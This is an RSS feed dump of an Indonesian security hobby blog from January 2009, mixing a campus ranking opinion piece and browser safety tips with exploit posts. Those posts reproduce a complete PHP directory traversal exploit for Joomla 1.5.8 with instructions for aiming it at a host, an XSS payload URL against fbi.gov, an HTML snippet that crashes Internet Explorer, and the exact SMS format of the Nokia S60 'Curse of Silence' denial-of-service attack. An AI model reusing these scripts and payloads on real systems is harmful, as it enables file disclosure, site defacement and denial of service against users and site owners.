w2vx3r'S BLOG http://williamblog.web.id about secure, secure and secure Sat, 31 Jan 2009 01:49:34 +0000 http://wordpress.org/?v=2.7 en hourly 1 “Kampus Terbaik” atau “Hanya Kampus Terbaik”?? http://williamblog.web.id/2009/01/30/kampus-terbaik-atau-hanya-kampus-terbaik/ http://williamblog.web.id/2009/01/30/kampus-terbaik-atau-hanya-kampus-terbaik/#comments Fri, 30 Jan 2009 13:56:56 +0000 w2vx3r http://williamblog.web.id/?p=96 Webometrics: Gunadarma Kampus Swasta Terbaik”

Begitulah judul yang dilontarkan dari situs detik.com pada hari Kamis, 29/01/2009 14:50 WIB. Dibeberapa situs gunadarma, blog para staff dan para mahasiswa bertebaran berita ini dan ucapan selamat luar biasa banyaknya untuk kampus-ku ini. Apakah se-luar biasa itu berita ini??

Selidik punya selidik saya menelusuri beberapa situs dan blog yang membahas hal ini dan mendapat hal yang menarik dari penilaian yang digunakan oleh si-webometrics ini. Penilaian dilakukan dengan 4 unsur penilaian. 4 unsur tersebut adalah visibility, rich files, size, dan google scholar.

—Visibility  merupakan banyaknya link external dari situs lain yang merujuk ke situs gunadarma atau sub-domainnya. Hal ini membuktikan banyaknya yang mengenal gunadarma dari dunia maya luar. (Mungkin untuk kedepannya unsur ini akan meningkat tajam seiring dengan peng-wajiban mahasiswa gunadarma memiliki blog dan mencantumkan link gunadarma diblognya).

—Rich Files merupakan banyaknya kekayaan file-file dalam bentuk pdf, word document, ppt dan lain sebagainya. Mungkin bisa diambil contoh yaitu file2 yang disediakan oleh para dosen di staffsitenya yang dapat kita download kapan saja.

—Size merupakan banyaknya halaman yang terdapat dalam situs gunadarma(termasuk sub domainnya) dimana semakin banyak maka akan menunjukkan banyaknya fasilitas yang disediakan oleh kampus tersebut.

—Google Scholar menyangkut banyaknya tulisan-tulisan ilmiah dari kampus tersebut.

Apa yang bisa ditangkap?? Masih terdapat kekurangan dari penilaian yang dilakukan oleh Webometrics. Penilaian yang dilakukan oleh Webometrics hanyalah mengukur ketersedian kampus akan banyaknya sumber-sumber materi yang disediakan, namun tidak menjamin sumber materi tersebut dimanfaatkan dengan baik. Hal yang dilakukan oleh Kampus Gunadarma adalah tepat yaitu menyediakan sumber materi tersebut tetapi untuk menjadi “kampus terbaik” tidak hanya sebatas itu kan??  Diperlukan partisipasi dan keaktifan mahasiswa untuk menjadi “kampus terbaik”.

Semoga dengan disediakannya fasilitas-fasilitas yang ada di kampus kita, kita dapat memanfaatkannya dengan baik. Kita juga tidak boleh terlalu bersenang hati dengan peringkat ini karena bisa menjadi bumerang kesombongan dan akhirnya membuat kita jatuh dilubang kesombongan kita sendiri. Akhir kata semoga Gunadarma bukan hanya menjadi “kampus terbaik” tetapi juga menjadi “kampus terbaik yang menghasikan mahasiswa terbaik”.

]]> http://williamblog.web.id/2009/01/30/kampus-terbaik-atau-hanya-kampus-terbaik/feed/ Situs FBI kena hack waktu nonton Wordpress.tv!!heh?? http://williamblog.web.id/2009/01/18/situs-fbi-kena-hack-waktu-nonton-wordpresstv/ http://williamblog.web.id/2009/01/18/situs-fbi-kena-hack-waktu-nonton-wordpresstv/#comments Sun, 18 Jan 2009 06:42:30 +0000 w2vx3r http://williamblog.web.id/?p=79 Waduh,,,,apa ini yang terjadi?? Berita aneh apa lagi ini??? Sebenarnya ini dua berita yang di-mix jadi satu oleh saya,hahha,,

wptv-logo

Berita pertama muncul dari wordpress yang mengeluarkan produk barunya yang bisa dibilang merupakan fasilitas yang berguna bagi para pecinta wordpress yang ingin tetap up to date dengan blognya di wordpress. Tidak hanya itu, fasilitas yang beralamatkan di wordpress.tv ini juga membantu para awam dalam mengenal dan mengatur wordpressnya. Yang kerennya kita tidak perlu membaca tulisan (baca: teks) karena telah disediakan dalam bentuk video yang menarik!! Yang patut disayangkan bandwidth internet-ku tidaklah cukup untuk melihat semua video menarik yang ditawarkan oleh wordpress.tv ,hehehehe,,,

Berita Kedua datang dari negeri Paman Obama,hehhe,,, Tanggal 17 kemarin pada forum bugtraq yang beralamatkan di http://seclists.org/bugtraq/2009/Jan/0164.html  telah diumumkan situs FBI terkena penyakit XSS (Cross-site scripting). Letaknya di http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML=’xssed’+unescape(’%20′)+’by’+unescape(’%20′)+’Matrix(S.B)’</script>

Yang pada waktu saya kunjungi masih belum dipatch.

xss-in-fbi

redirect-fbi

Ternyata ga cuman situs-situs pemerintah Indonesia saja yang jadi incaran ya,,,,

]]> http://williamblog.web.id/2009/01/18/situs-fbi-kena-hack-waktu-nonton-wordpresstv/feed/ Ada apa dengan gmail di germany?? http://williamblog.web.id/2009/01/15/ada-apa-dengan-gmail-di-germany/ http://williamblog.web.id/2009/01/15/ada-apa-dengan-gmail-di-germany/#comments Thu, 15 Jan 2009 00:35:03 +0000 w2vx3r http://williamblog.web.id/?p=71 germany-in-gmail

OKe,,,,dilihat dari gambar, apa yang bisa disimpulkan???

Karena saya juga ga begitu mengetahuinya, mungkin dari temen-temen ada yang pernah mengalaminya atau ada yang punya penjelasan akan hal ini??

Yang pasti ini bukan rekayasa dan ini saya alami sendiri. Mari kita “research” bersama.

]]> http://williamblog.web.id/2009/01/15/ada-apa-dengan-gmail-di-germany/feed/ High Security Risk Joomla, Directory Traversal http://williamblog.web.id/2009/01/12/high-security-risk-joomla-directory-traversal/ http://williamblog.web.id/2009/01/12/high-security-risk-joomla-directory-traversal/#comments Mon, 12 Jan 2009 14:37:38 +0000 w2vx3r http://williamblog.web.id/?p=59 Berita ini mungkin sudah basi, sudah sekitar 2 hari sejak Team Joomla mengeluarkan peringatan untuk mengupdate Joomla versi 1.5.8 ke versi 1.5.9 (tepatnya tanggal 10 January). Memang tanggal 07 January 2009 di situs kesayangan saya sudah diberitakan hal tersebut. Dalam berita tersebut dikatakan bahwa “Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability”, Joomla versi dibawah dari 1.5.8 dan versi 1.5.8 tersebut pada modul xstandard terdapat celah sehingga dapat dimungkinkan orang luar melihat isi dari direktori yang ada pada web korban. Sungguh sangat disayangkan pada saat itu saya sedang mempersiapkan ujian sehingga tidak dapat berexplorasi lebih lanjut,hahaha

Oke walaupun sudah banyak website yang meng-update versi joomlanya, tapi saya akan bahas tuntas tentang vulnerable yang satu ini. Pertama saya akan berikan source asli dari advisory(si penemu celah ini).

<?php

/*

Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal

Vulnerability

discovered by: irk4z[at]yahoo.pl

greets: all friends ;)

*/

echo “* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal

Vulnn”;

echo “* discovered by: irk4z[at]yahoo.pln”;

echo “*n”;

echo “* greets: all friends ;) enjoy!n”;

echo

“*——————————————————————*n”;

$host = $argv[1];

$path = $argv[2];

$folder = $argv[3];

if (empty($host) || empty($path)) {

echo “usage: php {$argv[0]} <host> <path> [<folder>]n”;

echo ” php {$argv[0]} example.org /joomlan”;

echo ” php {$argv[0]} example.org /joomla ../../n”;

exit;

}

echo “http://” . $host . $path . “/images/stories/nn”;

if ( empty($folder) ){

$lev = “./”;

for( $i = 0; $i <= 7; $i++ ) {

echo browseFolder($host, $path, $lev);

$lev .= “../”;

}

} else {

echo browseFolder($host, $path, $folder);

}

function browseFolder($host, $path, $folder){

$packet = “GET {$path}/plugins/editors/xstandard/attachmentlibrary.php

HTTP/1.1rn”;

$packet .= “Host: {$host}rn”;

$packet .= “X_CMS_LIBRARY_PATH: {$folder}rn”;

$packet .= “Connection: Closernrn”;

$o = @fsockopen($host, 80);

if(!$o){

echo “n[x] No response…n”;

die;

}

fputs($o, $packet);

while (!feof($o)) $data .= fread($o, 1024);

fclose($o);

$_404 = strstr( $data, “HTTP/1.1 404 Not Found” );

if ( !empty($_404) ){

echo “n[x] 404 Not Found… Maybe wrong path? n”;

die;

}

//folders

preg_match_all(”/<baseURL>([^<]+)</baseURL>/”, $data, $matches);

//files

preg_match_all(”/<value>([^<]+.[^<]{3,4})</value>/”, $data, $matches2);

$matches = array_merge( $matches[1], $matches2[1] );

if ( empty($matches) ){

$ret = “$folder [x] Failed…n”;

} else {

$ret = ”;

foreach( $matches as $tmp){

$ret .= str_replace(”images/stories/”, ”, str_replace(”/./”, “/”,

str_replace(”//”, “/”, urldecode($tmp) ) ) ) . “n”;

}

}

return ($ret);

}

?>

Mungkin anda sudah sangat muak melihat bahasa PHP tersebut, tetapi ternyata tidak semua bagian harus kita ubah agar proses “Local Directory Traversal” dapat berjalan. Saya hanya akan mengubah beberapa bagian seperti dibawah ini (yang digaris tebal merupakan yang saya ubah)

<?php

/*

Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal

Vulnerability

discovered by: irk4z[at]yahoo.pl

greets: all friends ;)

*/

echo “* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal

Vulnn”;

echo “* discovered by: irk4z[at]yahoo.pln”;

echo “*n”;

echo “* greets: all friends ;) enjoy!n”;

echo

“*——————————————————————*n”;

$host = “localhost“;

$path = “/joomlah/Joomla_1.5.5-Stable-Full_Package“;

$folder = “apa saja“;

Pada bagian $host merupakan alamat website yang ingin dilihat, disini saya menggunakan localhost (tentunya anda bisa mencobanya website diluar sana, saya menggunakan localhost karena keterbatasan waktu) Kemudian $path merupakan bagian jalur atau tambahan yang ada di website korban (misalnya: william.web.id/iniadalahpath/ ) dan $folder mungkin berguna untuk menentukan folder mana yang ingin dilihat sebagai ganti dari website yang tidak terdapat “path”, karena saya menggunakan path maka saya dapat memasukkan kata apa saja dan tidak banyak pengaruhnya (CMIIW). Oke tanpa basa basi kita lihat hasilnya:

joomla-local-directory

Terlihat isi dari file-file dimana letak direktorinya adalah http://localhost/joomlah/Joomla_1.5.5-Stable-Full_Package//images/stories/… Yang secara standarnya digunakan untuk menyimpan file-file gambar dan media pada para pengguna Joomla. Apakah hanya folder images/stories saja yang bisa terlihat?? Dalam percobaan singkat yang saya lakukan memang hanya folder images/stories saja yang bisa dilihat. Mungkin anda dapat memberitahu saya apabila ada folder lain yang dapat dilihat. Oiya,,,celah ini hanya akan menampilkan susunan folder dan file yang disimpan dalam images/stories. Tapi tentu saja dengan mengetahui nama filenya kita dapat mendownload file-file yang ditampilkan dalam list yang ada.

Celah ini dikategorikan “high” oleh Team Joomla dan saya sependapat dikarenakan menampilkan suatu folder yang semestinya tidak ditampilkan dapat berakibat fatal dan dapat dilakukan exploitasi lebih lanjut.

]]> http://williamblog.web.id/2009/01/12/high-security-risk-joomla-directory-traversal/feed/ IE crash!! (Again?) http://williamblog.web.id/2009/01/10/ie-crash/ http://williamblog.web.id/2009/01/10/ie-crash/#comments Sat, 10 Jan 2009 10:39:14 +0000 w2vx3r http://williamblog.web.id/?p=49 Satu lagi hadiah kecil dari Microsoft Internet Explorer. Kemarin tepatnya tanggal 9 January 2009 dikabarkan dalam artikel aslinya dengan judul yang biasa saja (“MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit”) tetapi sangat kritis ternyata didalamnya, terdapat “bug” atau semacamnya (CMIIW) yang dapat mengakibatkan “hang” total dan membuat browser IE ini menutup dirinya sendiri. Lihat gambar dibawah ini:

iecrash

Untuk membuat hang IE hanya dengan mengetikkan script HTML seperti ini:
==============================================
<html>
<title>MS IE ’screen[""]‘ Remote Denial of Service Vulnerability</title>
<body onload=screen[""]>
</html>

==============================================

Yupe sebuah javascript didalamnya dengan proses “onload”. Yang gw baca diartikel aslinya, ini dikarenakan pada saat pemprosesan fungsi onload dibelakang layar oleh IE dimana berisi NULL pointer sehingga IE menjadi crash!! (CMIIW again).
Bug ini dapat berfungsi di IE6 dan IE7. It tested and works!! Dan sampai artikel ini diturunkan belum ada patch yang dilakukan oleh Microsoft.
Penggunaannya??? Dikembalikan lagi ke imajinasi masing-masing. Atau ada yang mau ikut “menggerogoti IE” seperti yang apa ditulis pada artikel-artikel ini??

Firefox, Safari, & Chrome Terus Mengancam IE
IE ‘Mengurus’ Digerogoti Firefox, Safari dan Chrome

]]> http://williamblog.web.id/2009/01/10/ie-crash/feed/ NOKIA Series 60 Vulnerability!! http://williamblog.web.id/2009/01/06/nokia-series-60-vulnerability/ http://williamblog.web.id/2009/01/06/nokia-series-60-vulnerability/#comments Tue, 06 Jan 2009 15:14:16 +0000 w2vx3r http://williamblog.web.id/?p=22 Desember 31 2008 I get some issue from Techworld.com about “Phone hit by Curse of Silence attack”. For that time, I’m not interesting about that topic. In January 2 2009, I have same (not actually) issue from Packet Strom Security. This is summary about that news:

“Nokia S60 phones suffer from a SMS/MMS curse of silence denial of service vulnerability when having received a message with an email address over 32 characters.”

And I get twice a same news about this from Packet Strom Security (maybe my feeds error,hahaha). So I check it out, and find some interest knowledge from this vulnerability. You can see the complete story about this Nokia series 60 phones vulnerable from this link or you can download the video so you can watch how can it works!

Suggestion from me, don’t abuse that!!
Here is the complete story where I copy from https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt

================================================================
Vulnerability Advisory
======================
Remote SMS/MMS Denial of Service - “Curse Of Silence” for Nokia S60 phones

URL
===
https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt

Video
=====
https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-demo.avi

Affected Products
=================
All Nokia Series60 2.6, 2.8, 3.0, 3.1 devices, see detailed list at
the end of the document.

Requirements to Execute Attack
==============================
- MSISDN of the target
- mobile phone contract that allows sending of SMS messages
- (almost) any Nokia phone (or some other means of sending SMS messages with TP-PID set to “Internet Electronic Mail”)

Risk Level
==========
Medium (for S60 2.8 and 3.1 devices): Target will not be able to receive any SMS or MMS messages while the attack is ongoing. After that, only very limited message receiving is possible until the device is Factory Resetted High (for S60 2.6 and 3.0 devices): Target will not be able to receive any SMS or MMS messages until the device is Factory Resetted

Summary
=======
Emails can be sent via SMS by setting the messages Protocol Identifier to “Internet Electronic Mail” and formatting the message like this:

<email-address><space><message body>

If such messages contain an <email-address> with more than 32 characters, S60 2.6, 2.8, 3.0 and 3.1 devices are not able to receive other SMS or MMS messages anymore. 2.6 and 3.0 devices lock up after only one message, 2.8 and 3.1 devices after 11 messages.

Details
=======
3GPP TS 23.040 specifies a method for sending emails via SMS in section 3.8 (”SMS and Internet Electronic Mail interworking”). In its most basic form, such a SMS message starts with the from- (MT-SMS) or to-email-address (MO-SMS), followed by a space character, and then the message body. The TP-Procotol Identifier of the SMS message has to be set to “Internet Electronic Mail” (value: 50 / 0×32).

It is not specified how such a message should be displayed when received by the phone. Before S60 2.6, Series60 devices displayed such messages exactly as they were sent. Starting with S60 2.6, when the part of the message that should contain the from-address looks anything like an email address (i.e. it contains an “@” somewhere), this address is then displayed as the message sender instead of the usually shown TP-Originating-Address.

If this email address is longer than 32 characters, Series60 2.6, 2.8, 3.0 and 3.1 devices fail to display the message or give any indication on the user interface that such a message has been received. They do, however, signal to the SMSC that they received the message by sending an RP-ACK.

Devices running S60 2.6 or 3.0 will not be able to receive any other SMS message after that. The user interface does not give any indication of this situation. The only action to remedy this situation seems to be a Factory Reset of the device (by entering “*#7370#”).

Devices running S60 2.8 or 3.1 react a little different: They do not lock up until they received at least 11 SMS-email messages with an email address that is longer than 32 characters. The device will not be able to receive any other SMS message after that - upon receiving the next message, the phone will just display a warning that there is not enough memory to receive further messages and that data should be deleted first. This message is even displayed on an otherwise completely “empty” device.

After switching the phone off and on again, it has limited capability for receiving SMS messages again: If it receives a SMS message that is split up into several parts (3GPP TS 23.040, 9.2.3.24.1 Concatenated Short Messages) it is only able to receive the first part and will display the “not enough memory” warning again. After powercycling the device again, it can then receive the second part. If there is a third part, it has to be powercycled again, and so on.
Also, an attacker now just needs to send one more “Curse Of Silence” message to lock the phone up again. By always sending yet another one as soon as the status report for delivery of the previous message is received, the attacker could completely prevent a target from receiving any other SMS/MMS messages.

Only Factory Resetting the device will restore its full message receiving capabilities. Note that, if a backup is made using Nokia PC-Suite *after* being attacked, the blocking messages are also backuped and will be sent to the device again when restoring the backup after the Factory Reset.

Note that not being able to receive SMS messages also means not being able to receive MMS messages, since they are signalled by sending an SMS message to the device.

“Curse Of Silence” messages can be generated with any phone or cellular modem that supports 3GPP TS 27.005 AT commands and with most Nokia phones also directly from the user interface. For example, on S60 devices, when in the message editor, the type of the message can be switched to “E-mail” under “Options” -> “Sending options” -> “Message sent as”. The 6310i conveniently offers a “Write email” menu entry in the messaging menu.

The simplest form of content for a Curse Of Silence would be something like “123456789@123456789.1234567890123 ” (the digits are used only to illustrate the length of the “email address” of more than 32 characters). Note the space at the end of the message!

Workaround
==========

None known for the user side.

Until a firmware fix is available, network operators should filter messages with TP PID “Internet Electronic Mail” and an email address of more than 32 characters or reset the TP-PID of these messages to 0.

Credits
=======

Tobias Engel <tobias@ccc.de>
November 9, 2008

Many thanks to Frank Rieger for spending countless hours cutting and editing the video.

Detailed List of Affected Products
==================================

Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable component is a S60 base functionality, it seems safe to assume that all devices with these OS versions are affected.

S60 3rd Edition, Feature Pack 1 (S60 3.1):
Nokia E90 Communicator
Nokia E71
Nokia E66
Nokia E51
Nokia N95 8GB
Nokia N95
Nokia N82
Nokia N81 8GB
Nokia N81
Nokia N76
Nokia 6290
Nokia 6124 classic
Nokia 6121 classic
Nokia 6120 classic
Nokia 6110 Navigator
Nokia 5700 XpressMusic

S60 3rd Edition, initial release (S60 3.0):
Nokia E70
Nokia E65
Nokia E62
Nokia E61i
Nokia E61
Nokia E60
Nokia E50
Nokia N93i
Nokia N93
Nokia N92
Nokia N91 8GB
Nokia N91
Nokia N80
Nokia N77
Nokia N73
Nokia N71
Nokia 5500
Nokia 3250

S60 2nd Edition, Feature Pack 3 (S60 2.8):
Nokia N90
Nokia N72
Nokia N70

S60 2nd Edition, Feature Pack 2 (S60 2.6):
Nokia 6682
Nokia 6681
Nokia 6680
Nokia 6630

Change History
==============

December 30, 2008:
Removed auth details since they are no longer required

December 21, 2008:
Corrected version numbers for S60 2nd Edition

December 13, 2008:
S60 2.8 devices react like S60 3.1 devices, not like S60 2.6 or 3.0
devices

]]> http://williamblog.web.id/2009/01/06/nokia-series-60-vulnerability/feed/ Cara mudah mendapatkan password Yahoo lewat YM http://williamblog.web.id/2009/01/06/cara-mudah-mendapatkan-password-yahoo-lewat-ym/ http://williamblog.web.id/2009/01/06/cara-mudah-mendapatkan-password-yahoo-lewat-ym/#comments Tue, 06 Jan 2009 14:40:44 +0000 w2vx3r http://williamblog.web.id/?p=14 Hacking biasanya selalu dikaitkan dengan software yang canggih, baru dan muktakhir!! kali ini hacking dilakukan dengan mudah, dapat dilakukan oleh siapa saja!!

gw kasih ilustrasinya:

me : woi bos ternyata Yahoo!Messenger tu hebat banget loh!!
korban : hebat apanya??
me : neh gw praktekin ya,,
korban : apaan si??
me : ******
me : gimana??
korban : gimana apanya?? cuman keliatan *****
me : tadi tu gw ketik password gw
korban : ahhh gw keliatan ***** doank koq!!
me : nah itu hebatnya YM!! jadi klo kita ga sengaja ketik password kita, maka akan disensor ama YMnya!!
korban : hah??hebat banget
me : keren kan, loe coba dah
korban : gw coba ya
korban : inipasswordgwdiym
korban : gimana??
me :wuihhh bintang-bintang semua bos!! cakep2,,keren ya!
korban : banget!!!hahaha

soooo,,,hacking bukan hanya bermodalkan software canggih doank!berhati-hatilah!!

Thanks for r3ck0rd 2 shared this information

]]> http://williamblog.web.id/2009/01/06/cara-mudah-mendapatkan-password-yahoo-lewat-ym/feed/ Don’t use IE http://williamblog.web.id/2009/01/06/dont-use-ie/ http://williamblog.web.id/2009/01/06/dont-use-ie/#comments Tue, 06 Jan 2009 14:30:43 +0000 w2vx3r http://williamblog.web.id/?p=7 –Remove from kerak_jigong

–Created at Desember 18 2008

Semerbak bagaikan parfum, berita tentang celah/vulnerabe pada IE langsung mewarnai berbagai media internet bahkan media televisi (klo ga salah kemaren ada di metro tv) Sebenernya vulnerabe seperti apa si??

Pada situs security favorit saya diberitakan “Microsoft - Hole Exploit Endangers All IE Versions”. Terdapat celah pada mesin IE sehingga dapat dilakukan exploitasi/pengambilan alih oleh para hacker (black hat tentunya). Apa saja yang bisa dambil?? Banyak!! Layaknya pengambilan alih, berarti semua data dalam IE dapat diambil, bahkan mungkin bisa mengambil semua isi harddisk anda!!(mungkin loh) Exploitasi dapat dilakukan apabila pengguna mengunjungi suatu situs yang telah terinfeksi oleh entah suatu virus, atau malware(singkatan dari malicious software yang artinya program2 yang merugikan) lainnya sehingga ketika itu juga program jahat akan menggunakan celah(hole) dalam IE sehingga,,,bang!!! gotcha!!You’re the target!! LoL!

Ahhh,,,saya kan pakai IE ga nyimpen password atau berkunjung ke situs- situs aneh,,, Ga semua proses dalam membuka suatu website diketahui oleh kita, ada saja website yang baik tiba-tiba sudah dimasuki virus (contoh nyatanya seperti ilmukomputer.com yang bisa dimasuki virus yang akhrinya banyak kehilangan database mereka) bahkan ga smua mengecek URL yang ada di browser pada saat mengunjungi suatu situs, misalnya ketika bermain di warnet dan ingin mengunjungi friendster.com, ketika mengetikkan “www.f” maka akan muncul tampilan solusi pada browser yang pada akhirnya kita memilih menggunakan solusi tersebut kan?? bagaimana jika URL tersebut bukan www.friendster.com melainkan www.friensdster.com, dimana di www.friensdster.com sudah disisipi virus???

Kembali ke topik,,bahkan beberapa pakar menyarankan untuk berpindah ke browser lainya sementara Microsoft akan meng-patch IE. Pertanyaannya,,,pindah kemana??? Mozila kah?? Opera kah?? Safari kah?? chrome kan?? Baru tadi pagi gw dapet berita bahwa Opera melakukan Update “Opera Releases Update For Extremely Severe Vuln” sehingga pengguna Software Opera diwajibkan mengupgrade ke versi baru!! Ditambah lagi berita bertubi-tubi datang untuk firefox untuk masalah keamanannya!! berita tersebut

—Vuln: Mozilla Firefox/Thunderbird/SeaMonkey Multiple Remote Vulnerabilities

—Vuln: Mozilla Firefox MathML XHTML Null Pointer Dereference Denial of Service Vulnerability

Dan belum ada pemberitahuan untuk update MOzila sampai sekarang,,, tidak lain juga dengan safari dan chrome yang terdapat bug dan masih belum stabil. lalu bagaimana?? ga mungkin kita ga ngenet menunggu browser yang aman kan??

kiat-kiatnya:

–pacth selalu browser anda, toh cuman makan waktu bentar

–jangan malas mengetik URL!!(kebiasaan menular yang gw juga sering melakukannya)

–selama proses pengerjaan suatu website “berpassword” entah itu friendster, facebook(hahaha yang pake facebook siap2 kena virus Koobface yaaa), internet banking, paypal, studentsite, usahakan hanya membuka website itu saja sampai “Logout” barulah membuka web lain!!

–Ga usah install yang macem-macem lah di browser kalian(sepeti plug- in, widgets), tapi klo memang perlu tugas anda yaaa mengupdate terus plug-in2 tersebut,,karena dari plugin tersebut bisa menyebabkan browser kalian menjadi vulnerabe!!

18 des 2008-

]]> http://williamblog.web.id/2009/01/06/dont-use-ie/feed/